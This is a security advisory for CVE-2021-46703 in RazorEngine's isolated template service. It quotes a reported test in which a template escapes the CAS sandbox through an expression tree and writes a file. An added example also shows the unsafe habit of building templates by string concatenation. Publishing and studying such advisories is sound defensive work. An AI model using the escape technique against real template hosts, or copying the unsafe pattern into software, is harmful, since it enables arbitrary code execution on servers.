CVE-2021-46703: Announcement: Security with `IsolatedRazorEngineService` · Issue #585 · Antaris/RazorEngine
** UNSUPPORTED WHEN ASSIGNED ** In the IsolatedRazorEngine component of Antaris RazorEngine through 4.5.1-alpha001, an attacker can execute arbitrary .NET code in a sandboxed environment (if users can externally control template contents). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
This issue is to inform everyone that `IsolatedRazorEngineService`, which uses CAS (Code Access Security) internally, should not be considered ‘secure’ anymore, for several reasons:
- CAS has been obsolete for quite a while now
- CAS is not supported on the latest platform updates (.NET 5/6, .NET Core)
- Microsoft will no longer provide patches for security issues in it
In addition to the above, the following code sample was reported to me as an issue of RazorEngine itself (thanks @g2udevelopment):
```csharp
using System;
using System.IO;
using NUnit.Framework;
using RazorEngine.Templating;

// Reported reproduction: a template compiled and run inside the CAS-sandboxed
// "isolated" service still writes a file outside the sandbox.
// SandboxCreator is the AppDomain factory from RazorEngine's own test suite
// and is not shown in this issue.
static void IsolatedRazorEngineService_BadTemplate_InSandbox_Escape()
{
    using (var service = IsolatedRazorEngineService.Create(SandboxCreator))
    {
        string file = Path.Combine(Environment.CurrentDirectory, Path.GetRandomFileName());
        // The template builds an expression tree that writes the file, wraps it in
        // RazorDynamicObject and compiles/invokes it through 'dynamic'.
        string template = @"
@using System.IO
@using RC = RazorEngine.Compilation
@{
    System.Linq.Expressions.Expression<System.Action> exp = () => File.WriteAllText(""$file$"", ""BAD DATA"");
    dynamic d = (RC.RazorDynamicObject)RC.RazorDynamicObject.Create(exp);
    System.Action a = d.Compile();
    a();
}".Replace("$file$", file.Replace("\\", "\\\\")); // escape path separators for the C# string literal inside the template
        Assert.DoesNotThrow(() =>
        {
            service.RunCompile(template, "test");
        });
        // The sandbox should have prevented this write; the assertion passes.
        Assert.IsTrue(File.Exists(file));
    }
}
```
If you depend on `IsolatedRazorEngineService` for security I’d urge you to redesign your security. If you need a fast fix, you can use the attached patch (0001-Not-so-Safe.zip) and compile RazorEngine yourself (however, you will no longer be able to use ‘dynamic’ with this patch).
Just to clarify, you are only affected by this IF:
- you currently use `IsolatedRazorEngineService` and use CAS to control the template permissions, and
- users can externally control the template contents
If you use RazorEngine for e-mail generation or as a templating engine (documentation generation, …) you are most likely not directly affected by this issue, even if you use `IsolatedRazorEngineService`, as long as you use RazorEngine ‘correctly’. Correct usage means that you don’t allow direct user input into any part of the template source. This mistake can happen if you build the template by string concatenation instead of passing the data in through the `@` syntax elements (the model). Just to remind you: if you use string concatenation to build your template with untrusted user inputs, you allow your users to execute code on your system. This is most likely not what you want, with or without isolation!
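To make the distinction concrete, here is an added example (not code from the issue or from the RazorEngine project) that puts the string-concatenation mistake next to the correct model-based usage. The class and method names, the template keys and the `RazorEngine.Engine.Razor` entry point with its `RunCompile(source, name, modelType, model)` overload are taken from RazorEngine 3.x/4.x; anything else is an illustrative assumption.

```csharp
using System;
using RazorEngine;
using RazorEngine.Templating;

// Added example: untrusted input must reach the template as a model value,
// never as part of the template source. Names below are assumptions.
static class TemplateUsage
{
    // UNSAFE: the user's text becomes part of the Razor source itself. Any
    // input that starts a Razor code block (for example text beginning with
    // "@{") is compiled and run as C# on the server, with or without
    // IsolatedRazorEngineService. Shown only as the pattern to avoid.
    public static string RenderUnsafe(string untrustedName)
    {
        string template = "Hello " + untrustedName + "!";
        return Engine.Razor.RunCompile(template, "greeting-unsafe", null, null);
    }

    // SAFE: the template source is fixed and written by the developer. The
    // untrusted value only travels through the model; Razor writes it out as
    // data (HTML-encoded by RazorEngine's default encoder) and never treats
    // it as code, so "@{ ... }" in the input is rendered as literal text.
    public static string RenderSafe(string untrustedName)
    {
        const string template = "Hello @Model.Name!";
        return Engine.Razor.RunCompile(template, "greeting-safe", null, new { Name = untrustedName });
    }

    // Simple check you can run in a console app to see the difference:
    // RenderSafe("@{ throw new System.Exception(); }") returns the input as
    // escaped text, while RenderUnsafe on the same input executes it.
    static void Main()
    {
        Console.WriteLine(RenderSafe("<World>"));
    }
}
```

The fix is therefore not a different sandbox but a different data flow: keep every template as developer-authored source (stored, cached and compiled once under a fixed key) and let user data enter only via `@Model`, `ViewBag` or template parameters. If your application genuinely needs users to author templates, treat that as remote code execution by design and run it in a separate process or host with its own OS-level permissions rather than relying on CAS.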